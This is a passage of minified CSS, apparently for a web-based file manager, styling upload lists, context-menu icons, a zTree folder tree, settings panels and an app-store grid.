.title{color:#3A87AD;width:160px;width:50%;font-weight:800;}.file-upload-box .uploader-list .item .info .size,.file-upload-box .download-list .item .info .size{width:45px;text-align:center;color:#3A87AD;font-size:12px;}.file-upload-box .uploader-list .item .info .state,.file-upload-box .download-list .item .info .state{width:100px;width:27%;text-align:right;font-size:12px;}.file-upload-box .uploader-list .item .info .font-icon,.file-upload-box .download-list .item .info .font-icon{margin-left:12px;font-size:20px;width:20px;line-height:35px;cursor:pointer;color:#bbb;}.file-upload-box .uploader-list .item .info .font-icon:hover,.file-upload-box .download-list .item .info .font-icon:hover{text-decoration:none;color:#f60;}.file-upload-box .uploader-list .item .info .icon-ok,.file-upload-box .download-list .item .info .icon-ok{color:#40AA53;}.file-upload-box .uploader-list .item .info .error,.file-upload-box .download-list .item .info .error{color:#f30;}.file-upload-box .uploader-list .item.success,.file-upload-box .download-list .item.success{background:#eaf8ff;}.file-upload-box .uploader-list .item.error,.file-upload-box .download-list .item.error{background:#ffe8e6;}.file-upload-box .uploader-list .item .progress,.file-upload-box .download-list .item .progress{height:38px;margin:0px;width:100%;border-radius:0;box-shadow:none;position:absolute;top:0;}.file-upload-box .uploader-list .item .progress-bar,.file-upload-box .download-list .item .progress-bar{background-color:#adf;background-image:linear-gradient(45deg,rgba(255,255,255,0.35) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.35) 50%,rgba(255,255,255,0.35) 75%,transparent 75%,transparent);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ddeeff',endColorstr='#88ccff',GradientType=1);BACKGROUND-REPEAT:repeat-x;}.file-upload-box .uploader-list .success:hover,.file-upload-box .download-list .success:hover{cursor:pointer;background:#def;border-bottom:1px solid #3A87AD;}@media screen and (-ms-high-contrast:active),(-ms-high-contrast:none){.btn{ padding:5px 14px;} input[type='checkbox'].kui-checkbox-ios.size-big + em{ height:27px;} #body .system-content .right-frame .user-list table tr td.select input{ position:relative;top:4px;} #body table tr input[type='text']{ line-height:22px;} .do-search-box .search-header .btn-right{ margin:-9px 0 0 -2px;height:23px;} .appbox .appline.icon .open{ margin-top:-2px;} .appbox .appline label{ position:relative;top:-4px;} #body .main .group-editor .tag input{ position:relative;top:-5px;} .share-dialog .aui-border{ overflow:auto;} .share-dialog .content-box .content-info .input-line.select-path a.select-btn{ padding:3px 8px 4px;} .kui-radio + span, .kui-checkbox + span{ position:relative;top:-6px;} .kui-radio.size-small + span, .kui-checkbox.size-small + span{ position:relative;top:-4px;} .kui-radio.size-smallx + span, .kui-checkbox.size-smallx + span{ position:relative;top:-2px;}}@media (max-width:743px){html #body .app-menu-left, html body .app-menu-left{ width:50px;min-width:50px;} html #body .app-menu-left .search{ opacity:0.001;} html #body .menu-left .setting a.selected, html body .menu-left .setting a.selected{ padding-left:0px;margin-left:-5px;} html #body .main.app-content, html body .main.app-content{ left:50px;} html #body .main.app-content .app-list, html body .main.app-content .app-list{ justify-content:space-around;} html .form-box .form-row .setting-title{ text-align:left;} html .form-box .form-row.form-userSelect .setting-content{ padding:10px 5%;} html .form-box .form-row .setting-content{ width:90%;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group{ width:100%;height:40px;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .form-box.config-box .panel-body{ left:0px;top:80px;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item{ float:left;} html #body.plugin-page .app-menu-left .line, html body.plugin-page .app-menu-left .line{ padding:4px 0;} html body #body .menu-left, html body #body .app-menu-left{ width:50px;min-width:50px;} html body #body .menu-left h1, html body #body .app-menu-left h1{ font-size:14px;font-weight:800 !important;padding:10px 0px 10px 0px;text-align:center;} html body #body .menu-left .font-icon, html body #body .app-menu-left .font-icon{ padding-right:30px;} html #body .setting-tools-right, html body .setting-tools-right{ top:0;} html #body .main .nav a, html body .main .nav a{ padding:5px 10px;} html #body .main .nav, html body .main .nav{ margin-right:0px;} html #body .setting-tab, html body .setting-tab, html #body .system-content, html body .system-content{ margin-right:10px;} html #body .main, html body .main{ left:50px;width:auto;margin-right:10px;} html .form-box .form-row .desc, html .form-box .form-row .setting-content i{ display:block;} html #body .setting-tab .form-row, html body .setting-tab .form-row, html #body .system-content .form-row, html body .system-content .form-row{ background:#fafafa;border-radius:4px;padding:0 5px;} html .form-box .form-row .setting-title{ height:20px;line-height:20px;} html .form-box .form-row{ padding:0;} html .form-box .form-row input[type='text'], html .form-box .form-row input[type='password'], html .form-box .form-row input[type='number']{ width:180px;} html .form-box .form-row #wallpage-url{ width:150px !important;} html #body .main .section .content .box p, html body .main .section .content .box p{ text-indent:10px;} html #body .system-content.setting-member{ width:800px;} html body.setting-page .select-user-group .right-content, html body.setting-page .select-user-group .left-content{ width:170px;} html .topbar .content .top-right ul.dropdown-menu.topbar-language{ width:235px;max-height:800px;} html #body .main .section .box, html body .main .section .box{ margin-right:10px;} html #body .main .section .box .list, html body .main .section .box .list{ width:95px;height:95px;} html #body .main .section .box .list .ico, html body .main .section .box .list .ico{ width:75px;height:60px;} html #body .panel, html body .panel{ margin-right:0px;} html #body .main.app-content .app-list .app-li, html body .main.app-content .app-list .app-li{ margin:0 5px 20px 0;width:130px;} html #body .main.app-content .app-model, html body .main.app-content .app-model{ padding:10px;} html #body .menu-left .setting a, html body .menu-left .setting a{ text-indent:6px;} html .file-list-list .file .filename, html #main-title .filename, html .file-list-list .file .filetime, html #main-title .filetime{ width:100px;} html .file-list-list .file .filetype, html #main-title .filetype, html .file-list-list .file .filesize, html #main-title .filesize{ width:30px;} html .topbar .content .btn-wap-menu{ display:block !important;visibility:visible !important;position:absolute;text-align:center;z-index:100;left:0;top:0;padding:0;background:rgba(0,0,0,0.05);width:45px;height:38px;line-height:40px;} html .topbar .content .btn-wap-menu i.font-icon{ padding-right:0;} html .topbar .content .top-left.collapse{ display:none;} html .topbar .content .top-left{ width:170px;height:auto;background:#fff;color:#666;position:absolute;left:45px;z-index:100;border:1px solid rgba(0,0,0,0.1);box-shadow:0 4px 30px rgba(0,0,0,0.15);} html .topbar .content .top-left .topbar-menu.title{ display:none;} html .topbar .content .top-left .topbar-menu{ float:none;border:none;} html body#page-desktop .topbar .content .btn-wap-menu{ color:#fff;} html body#page-desktop .topbar .content .top-left{ background:rgba(0,0,0,0.7);}}@-webkit-keyframes fadein{0%{ opacity:0;} 50%{ opacity:0.4;}}.playmusic-icon{display:none;}.context-menu-list{margin:0;margin-left:4px;min-width:190px;max-width:300px;font-size:1em;display:inline-block;position:absolute;list-style-type:none;padding:8px 0px;border:none;border:1px solid #ccc \9;border-radius:4px;background:#fff;-webkit-box-shadow:0 10px 80px rgba(0,0,0,0.4);-moz-box-shadow:0 10px 80px rgba(0,0,0,0.4);box-shadow:0 10px 80px rgba(0,0,0,0.4);}.context-menu-list span b{display:inline-block;font-size:1em;font-weight:200;color:#aaa;padding-left:10px;min-width:50px;text-align:right;overflow:hidden;position:absolute;right:10px;width:65px;}.context-menu-list .hover>span>b{color:#fff;}.context-menu-list.menu-auto-fit{top:5px !important;}.context-menu-list li.selected{border-left:none !important;background:none;}.context-menu-list li.selected i.font-icon{color:#aaa;font-family:FontAwesome;font-weight:normal;font-style:normal;}.context-menu-list li.selected i.font-icon:before{content:"\f00c" !important;}.context-menu-list .context-menu-submenu:after{content:"\f0da";font-family:FontAwesome;display:inline-block;float:right;margin-right:0px;right:10px;position:absolute;}.context-menu-list .context-menu-item{display:block;cursor:pointer;white-space:nowrap;clear:both;line-height:25px;height:23px;position:relative;border:none;padding:0px 20px 0 15px;color:#222;-webkit-transition:background-color .1s;-moz-transition:background-color .1s;-o-transition:background-color .1s;-ms-transition:background-color .1s;transition:background-color .1s;}.context-menu-list .context-menu-item .font-icon{display:inline-block;width:16px;text-align:center;font-size:1.2em;color:#aaa;margin-right:15px;vertical-align:middle;margin-top:-2px;padding:0;}.context-menu-list .context-menu-item.disabled,.context-menu-list .context-menu-item.disable{cursor:not-allowed;pointer-events:auto;color:#ccc;}.context-menu-list .context-menu-item.disabled .font-icon,.context-menu-list .context-menu-item.disable .font-icon{color:#ddd;}.context-menu-list .context-menu-item.disabled.hover,.context-menu-list .context-menu-item.disable.hover{color:#ccc;cursor:default;background-color:#fff;}.context-menu-list .context-menu-item.disabled.hover .font-icon,.context-menu-list .context-menu-item.disable.hover .font-icon{color:#ddd;}.context-menu-list .context-menu-item.hover{cursor:pointer;color:#fff;background:#63acff;background-color:none \9;}.context-menu-list .context-menu-item.hover .font-icon{color:#fff;color:#aaa \9;}.context-menu-list .context-menu-item span i{float:right;text-align:right;font-style:normal;color:#888;}.context-menu-list .context-menu-item.context-menu-separator{height:2px;line-height:0;border-bottom:1px solid #eee;margin:2px 0 4px;}.context-menu-list .context-menu-item > .context-menu-list{display:none;right:-5px;top:5px;}.context-menu-list .context-menu-item.hover > .context-menu-list{display:block;}.context-menu-list .context-menu-item.hover > .context-menu-list .font-icon{color:#aaa;}.context-menu-list .context-menu-item.hover > .context-menu-list .hover .font-icon{color:#fff;color:#aaa \9;}.context-menu-list .context-menu-item .context-menu-accesskey{text-decoration:underline;}.context-menu-list .context-menu-item .line-top{border-top:1px solid #ddd !important;}.font-icon.icon-home,.x-tree-self{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -496px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;filter:none;-ms-filter:none;}.font-icon.icon-home:before,.x-tree-self:before{content:"" !important;}.font-icon.icon-circle-arrow-up{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -496px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;}.font-icon.icon-circle-arrow-up:before{content:"" !important;}.x-tree-fav.small{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -773px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;}.x-tree-fav.small:before{content:"" !important;}.frame-right #search .font-icon.icon-search{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -736px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;margin-top:4px;}.frame-right #search .font-icon.icon-search:before{content:"" !important;}.context-menu-list .font-icon:before{color:#249dff;background-image:-webkit-linear-gradient(2deg,#249dff,#08558a);background-clip:text;text-fill-color:transparent;-webkit-text-fill-color:transparent;-webkit-background-clip:text;}.context-menu-list .context-menu-item.disabled .font-icon,.context-menu-list .context-menu-item.disable .font-icon{opacity:0.3;filter:alpha(opacity=30);}.context-menu-list .context-menu-item.search .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 0px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.search .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.open .font-icon,.context-menu-list .context-menu-item.open-the-path .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -16px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.open .font-icon:before,.context-menu-list .context-menu-item.open-the-path .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.upload .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -48px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.upload .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.down .font-icon,.context-menu-list .context-menu-item.download .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -48px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.down .font-icon:before,.context-menu-list .context-menu-item.download .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.cute .font-icon,.context-menu-list .context-menu-item.cute-to .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -80px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.cute .font-icon:before,.context-menu-list .context-menu-item.cute-to .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.copy .font-icon,.context-menu-list .context-menu-item.copy-to .font-icon,.context-menu-list .context-menu-item.copy-see .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -96px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.copy .font-icon:before,.context-menu-list .context-menu-item.copy-to .font-icon:before,.context-menu-list .context-menu-item.copy-see .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.newfolder .icon-folder-close-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -16px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.newfolder .icon-folder-close-alt:before{content:"" !important;}.context-menu-list .context-menu-item.newfile .icon-expand-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.newfile .icon-expand-alt:before{content:"" !important;}.context-menu-list .context-menu-item.rname .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -64px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.rname .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.past .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -64px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.past .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.remove .font-icon,.context-menu-list .context-menu-item.fav-remove .font-icon,.context-menu-list .context-menu-item .close .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -80px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.remove .font-icon:before,.context-menu-list .context-menu-item.fav-remove .font-icon:before,.context-menu-list .context-menu-item .close .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.zip .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.zip .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.unzip .icon-folder-open-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.unzip .icon-folder-open-alt:before{content:"" !important;}.context-menu-list .context-menu-item.share .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-15px -703px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.share .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.open-text .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:1px -702px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.open-text .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.setBackground .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -609px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.setBackground .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.fav .font-icon,.context-menu-list .context-menu-item.fav-page .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -773px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.fav .font-icon:before,.context-menu-list .context-menu-item.fav-page .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.set-file-icon-size .font-icon.icon-picture,.context-menu-list .context-menu-item.setting-wall .font-icon.icon-picture{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0px -577px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.set-file-icon-size .font-icon.icon-picture:before,.context-menu-list .context-menu-item.setting-wall .font-icon.icon-picture:before{content:"" !important;}.context-menu-list .context-menu-item.sort-by .font-icon.icon-sort{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -528px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.sort-by .font-icon.icon-sort:before{content:"" !important;}.context-menu-list .context-menu-item.list-icon .font-icon.icon-eye-open{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:1px -625px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.list-icon .font-icon.icon-eye-open:before{content:"" !important;}.context-menu-list .context-menu-item .font-icon.icon-code-fork{display:inline-block;background-image:url("../../../images/file_icon/icon_app/history.png");width:16px !important;background-repeat:no-repeat;background-size:100% 100%;}.context-menu-list .context-menu-item .font-icon.icon-code-fork:before{content:"" !important;}.context-menu-list .context-menu-item .font-icon.icon-info{color:#fff !important;background:#c4e5ff;text-align:center;width:15px;border-radius:50%;height:15px;line-height:15px;margin-right:15px;box-shadow:0 0 0 1px #6db9f5;}.ztree{margin:0px;padding:10px 0px;font-size:1em;}.ztree li{padding:0;margin:0;list-style:none;text-align:left;white-space:nowrap;outline:0;}.ztree li ul{margin:0;padding:0;}.ztree li.level0{margin-bottom:4px;}.ztree li.level0>span.tree_icon{width:20px;}.ztree li span{line-height:24px;}.ztree li span.button{line-height:0;margin:0;display:inline-block;vertical-align:middle;cursor:pointer;outline:none;background-color:transparent;background-repeat:no-repeat;height:24px;width:20px;margin-right:5px;}.ztree li span.button.switch{width:25px;height:25px;margin-right:0px;background:none;text-align:center;line-height:25px;}.ztree li span.button.switch:hover{background:rgba(0,0,0,0.03);}.ztree li span.button.switch:after{content:"\f0da";font-family:FontAwesome;color:#aaa;text-decoration:inherit;font-size:1.25em;line-height:16px;padding-left:6px;-webkit-font-smoothing:antialiased;}.ztree li span.button.switch.noline_docu:after{content:' ';}.ztree li span.button.switch.noline_open:after,.ztree li span.button.switch.noline_open_hover:after{content:"\f0d7";}.ztree li span.button.switch.switch_hover:after{color:#63acff;}.ztree li span.button.ico_loading{background:url("../../../images/common/loading_tree.gif") no-repeat 0 0px transparent !important;}.ztree li span.button.ico_loading .x-item-file{display:none;}.ztree li span.tree_icon{height:21px;width:21px;background:none;overflow:hidden;}.ztree li span.tree_icon img{width:100%;max-width:100%;max-height:100%;}.ztree li a{padding-top:0px;cursor:pointer;text-decoration:none;display:block;margin:0;color:#333;vertical-align:top;line-height:24px;height:24px;padding-left:10px;border:1px solid #fff;position:relative;}.ztree li a:hover{text-decoration:none;-webkit-transition:all 0.1s;-moz-transition:all 0.1s;-o-transition:all 0.1s;-ms-transition:all 0.1s;transition:all 0.1s;background:#eee;height:24px;border:1px solid #eee;}.ztree li a.curSelectedNode,.ztree li a.curDropTreeNode{border:1px solid #63acff;background:#63acff;line-height:24px;height:24px;color:#fff;}.ztree li a.curSelectedNode .button.switch:after,.ztree li a.curDropTreeNode .button.switch:after{color:#fff !important;}.ztree li a.curDropTreeNode{box-shadow:0 0 0 1px #fff inset !important;}.ztree li a.curSelectedNode_Edit{border:1px solid #63acff;background:#63acff;color:black;height:24px;}.ztree li a input.rename{height:25px;line-height:24px;padding:0;margin:0;border:none;outline:none;margin-left:-3px;padding-left:3px;width:106px;position:absolute;margin-top:-1px;}.ztree li a span.button.root_docu,.ztree li a span.button.noline_docu{background:none;}.ztree li a .menu-item{display:none;position:absolute;right:4px;top:4px;width:14px;height:13px;box-sizing:content-box;text-align:center;border:1px solid #ccc;background:#fff;border-radius:2px;cursor:pointer;z-index:50;}.ztree li a .menu-item:hover{border-color:#3399ff;background:#dff1ff;box-shadow:0 0 5px rgba(0,0,0,0.1);}.ztree li a .menu-item:hover .cert{border-top-color:#3399ff;}.ztree li a .menu-item .cert{margin-top:5px;margin-left:3px;width:0;height:0;border-left:4px solid transparent;border-right:4px solid transparent;border-top:5px solid silver;}.ztree li a:hover .menu-item,.ztree li a.curSelectedNode .menu-item{display:block;}ul.ztree.zTreeDragUL{margin:0;padding:0;position:absolute;width:auto;height:auto;background-color:#63acff;border:1px solid #63acff;opacity:0.5;filter:alpha(opacity=50);}ul.ztree.zTreeDragUL li a span.space{display:none !important;}ul.ztree.zTreeDragUL li a{padding:4px 10px 0 10px;color:#fff;}ul.ztree.zTreeDragUL li span.button.switch{display:none;}.ztree li a.tmpTargetNode_inner{background:#0076fc;border:1px solid #3091ff;color:#fff;}.ztree li a.tmpTargetNode_prev{border-bottom:1px solid #f96;}.ztree li a.tmpTargetNode_next{border-bottom:1px solid #f96;}span.tmpzTreeMove_arrow{display:inline-block;margin:4px 0 0 2px;position:absolute;border-color:transparent transparent transparent #fff;border-style:solid;border-width:7px 0px 7px 7px;width:0;height:0;_border-top-color:white;_border-bottom-color:white;_filter:chroma(color=white);}.frame-left .ztree li .file{line-height:0;margin:0;display:inline-block;vertical-align:middle;cursor:pointer;outline:none;background-color:transparent;background-repeat:no-repeat;height:22px;width:18px;margin-right:5px;}body{-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;overflow-x:hidden;}body ul{margin:0;padding:0;}body li{margin:0;padding:0;}#body a,body a{text-decoration:none;}#body input[type='text'],#body input[type='password'],body input[type='text'],body input[type='password']{padding-left:0.5em;outline:none;border:1px solid #bbb;border:1px solid #ddd;background:#fff;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;border-radius:3px;}#body input[type='text']:focus,#body input[type='password']:focus,body input[type='text']:focus,body input[type='password']:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}#body .font-icon,body .font-icon{padding-right:0.8em;display:inline-block;}#body .system-content .left-frame .left-content .role-box ul li.select,body .system-content .left-frame .left-content .role-box ul li.select{background:#80DBFF;}#body .system-content .left-frame .left-content .ztree li a,body .system-content .left-frame .left-content .ztree li a{border:1px solid #fff;padding:0px;}#body .system-content .left-frame .left-content .ztree li a.hover,body .system-content .left-frame .left-content .ztree li a.hover{border:1px solid #63acff;color:#444;}#body .system-content .left-frame .left-content .ztree li a.curSelectedNode,body .system-content .left-frame .left-content .ztree li a.curSelectedNode{color:#666;border:1px solid #63acff;}#body .system-content .left-frame .left-content .ztree li a.curSelectedNode.hover,body .system-content .left-frame .left-content .ztree li a.curSelectedNode.hover{color:#666;border:1px solid #63acff;}#body .panel,body .panel{border-radius:0;margin-right:30px;}#body .panel-default>.panel-heading,body .panel-default>.panel-heading{background:#eee;padding:8px 15px;}#body .panel-title,body .panel-title{font-size:1.1em;}#body .setting-tab,#body .system-content,body .setting-tab,body .system-content{margin-right:30px;}#body .setting-tab .panel-body,#body .system-content .panel-body,body .setting-tab .panel-body,body .system-content .panel-body{padding:20px 0 0 0;}#body .setting-tab .form-row,#body .system-content .form-row,body .setting-tab .form-row,body .system-content .form-row{padding:0 5px;}#body .setting-tab .line,#body .system-content .line,body .setting-tab .line,body .system-content .line{margin:10px 10px;}#body .setting-tab .form-row .setting-title,#body .system-content .form-row .setting-title,body .setting-tab .form-row .setting-title,body .system-content .form-row .setting-title{text-align:left;}#body .setting-tab .form-row-submit,#body .system-content .form-row-submit,body .setting-tab .form-row-submit,body .system-content .form-row-submit{background:#eee;margin:10px 0 10px 0;border-top:1px solid #ddd;height:60px;width:100%;}#body .setting-tab .form-row-submit .setting-content,#body .system-content .form-row-submit .setting-content,body .setting-tab .form-row-submit .setting-content,body .system-content .form-row-submit .setting-content{margin:10px;}#body .setting-tab .form-row-submit .btn,#body .system-content .form-row-submit .btn,body .setting-tab .form-row-submit .btn,body .system-content .form-row-submit .btn{padding:4px 2em;margin-left:10px;}#body .setting-tab .form-row-submit .btn.btn-remove,#body .system-content .form-row-submit .btn.btn-remove,body .setting-tab .form-row-submit .btn.btn-remove,body .system-content .form-row-submit .btn.btn-remove{float:right;color:#666;background:none;}#body .setting-tab .form-row-submit .save,#body .system-content .form-row-submit .save,body .setting-tab .form-row-submit .save,body .system-content .form-row-submit .save{width:60px;}#body .setting-tools-right,body .setting-tools-right{position:absolute;right:30px;top:27px;}#body .setting-tools-right .version-vip,body .setting-tools-right .version-vip{display:inline-block;float:right;right:120px;top:26px;text-align:center;padding:0px 10px;height:24px;line-height:24px;border-radius:3px;}#body .setting-tools-right .system-setting-more,body .setting-tools-right .system-setting-more{margin-left:10px;}#body .color-default,body .color-default{position:absolute;left:500px;top:28px;margin-top:43px;width:325px;border-radius:6px;box-shadow:0 0 20px #ddd inset;}#body .color-default .color-list,body .color-default .color-list{width:50px;height:50px;float:left;margin:7px;cursor:pointer;box-shadow:0 0 10px #ddd;border-radius:50%;}#body .color-default .color-list:hover,body .color-default .color-list:hover{box-shadow:0 0 10px rgba(0,0,0,0.5);}#body .ztree,body .ztree{padding:5px 5px;}#body .menu-left,body .menu-left{position:fixed;z-index:10;background:#f9f9f9;left:0;height:100%;width:18%;border-right:1px solid #ddd;margin-left:-1px;}#body .menu-left h1,body .menu-left h1{text-align:left;color:#666;padding:15px 20px 10px 30px;font-size:35px;font-weight:800;margin:0;padding:10px 0px 10px 20px;font-size:28px;height:50px;line-height:50px;letter-spacing:2px;}#body .menu-left .setting a,body .menu-left .setting a{height:40px;line-height:40px;text-decoration:none;box-sizing:border-box;text-indent:8px;color:#666;display:block;overflow:hidden;cursor:pointer;text-transform:capitalize;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;font-size:15px;}#body .menu-left .setting a:hover,body .menu-left .setting a:hover{background:#f3f3f3;}#body .menu-left .setting a.selected,body .menu-left .setting a.selected{background:#ddd;color:#000;border-left:5px solid #EA533F;padding-left:10px;}#body .main .dropdown-menu,body .main .dropdown-menu{font-size:13px;}#body .main.app-content,body .main.app-content{left:160px;right:0;bottom:0;top:0;margin:0;width:auto;height:auto;}#body .main.app-content .app-model,body .main.app-content .app-model{position:absolute;bottom:0;top:0px;left:0px;right:0;overflow:auto;padding:20px;overflow-x:hidden;}#body .main.app-content .app-model .h1,body .main.app-content .app-model .h1{border-bottom:1px solid #ddd;padding-bottom:10px;}#body .main.app-content .app-model .search-words,body .main.app-content .app-model .search-words{font-size:14px;position:absolute;padding:5px 10px;margin:0 10px;}#body .main.app-content .app-model .clear-search-btn,body .main.app-content .app-model .clear-search-btn{cursor:pointer;display:inline-block;}#body .main.app-content .app-model .clear-search-btn:hover,body .main.app-content .app-model .clear-search-btn:hover{color:#f6b29b;}#body .main.app-content .app-list,body .main.app-content .app-list{margin-top:10px;margin-right:-15px;padding:10px 0 40px 0;display:flex;justify-content:space-between;flex-wrap:wrap;}#body .main.app-content .app-list .flex-empty,body .main.app-content .app-list .flex-empty{margin:0 15px 20px 0;width:140px;height:1px;}#body .main.app-content .app-list .app-li,body .main.app-content .app-list .app-li{list-style:none;cursor:pointer;text-align:center;float:left;margin:0 15px 20px 0;width:140px;height:200px;background:#f5faff;color:#2196F3;border:1px solid #d2d7dc;position:relative;-webkit-transition:0.16s all;-moz-transition:0.16s all;-o-transition:0.16s all;-ms-transition:0.16s all;transition:0.16s all;border-radius:4px;background:none;border:1px solid #dee5e7;box-shadow:0 1px 2px rgba(0,0,0,0.1);}#body .main.app-content .app-list .app-li:hover,body .main.app-content .app-list .app-li:hover{background:#e2f2ff;}#body .main.app-content .app-list .app-li:hover,body .main.app-content .app-list .app-li:hover{background:#fff;box-shadow:0px 20px 100px rgba(0,0,0,0.1), 0px 20px 30px rgba(0,0,0,0.05);}#body .main.app-content .app-list .app-li .price-label,body .main.app-content .app-list .app-li .price-label{position:absolute;top:10px;right:-1px;border-radius:0;line-height:24px;height:24px;padding:0 10px;box-shadow:-3px 2px 5px rgba(0,0,0,0.3);}#body .main.app-content .app-list .app-li .price-label.label:before,body .main.app-content .app-list .app-li .price-label.label:before{position:absolute;top:0;left:-14px;content:" ";height:0;width:0;border:#f0ad4e 12px solid;border-left-color:transparent;}#body .main.app-content .app-list .app-li .price-label.label-warning,body .main.app-content .app-list .app-li .price-label.label-warning{background:#ff9800;}#body .main.app-content .app-list .app-li .price-label.label-warning.label:before,body .main.app-content .app-list .app-li .price-label.label-warning.label:before{border-color:#ff9800;border-left-color:transparent;}#body .main.app-content .app-list .app-li .price-label.label-success,body .main.app-content .app-list .app-li .price-label.label-success{background:#00a854;}#body .main.app-content .app-list .app-li .price-label.label-success.label:before,body .main.app-content .app-list .app-li .price-label.label-success.label:before{border-color:#00a854;border-left-color:transparent;}#body .main.app-content .app-list .app-li .icon,body .main.app-content .app-list .app-li .icon{background-image:linear-gradient(to bottom,#def 0,#fff 100%);border-radius:4px;}#body .main.app-content .app-list .app-li .flag-box,body .main.app-content .app-list .app-li .flag-box{overflow:hidden;position:absolute;right:0;width:60px;height:60px;}#body .main.app-content .app-list .app-li .flag,body .main.app-content .app-list .app-li .flag{position:absolute;top:10px;right:-28px;width:100px;height:22px;line-height:22px;box-shadow:0 1px 5px 